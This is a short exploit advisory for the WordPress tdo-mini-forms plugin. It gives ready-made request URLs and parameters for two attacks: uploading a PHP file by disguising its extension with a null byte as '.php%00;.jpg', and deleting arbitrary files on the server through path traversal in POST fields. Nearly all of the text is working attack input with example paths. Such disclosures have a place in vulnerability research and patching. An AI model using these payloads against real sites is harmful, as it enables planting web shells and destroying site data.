wordpress tdo-mini-forms plugin (rfu/rfd) Vulnerabilities
 
------------------------------------------------------------
wordpress tdo-mini-forms plugin (remote file upload/remote file deletion) Vulnerabilities
Auther : Cold z3ro , www.hackteach.org , www.s3curi7y.com
Anonymous => You are the man 
 
 
# Remote file upload :
 
wordpress/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
 
file extension : file.php%00;.jpg
uploaded path :
wordpress/wp-content/uploads/tdomf/tmp/$tdomf_form_id(value)/$user_agent(IP)/$filename.PHP%00;.jpg
 
Example to uploaded path :
wordpress/wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg
 
 
 
# Remote file Deletion
 
=> Note : useing Any http POST header modifier .
 
tdomf_form_id = 1;
deletefile[]  = 1;
filepath      = $varibale ( wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg )
index         = NULL
 
Example to result : 
wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&deletefile[]=1&filepath=../../../wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg&index=
 
Eof;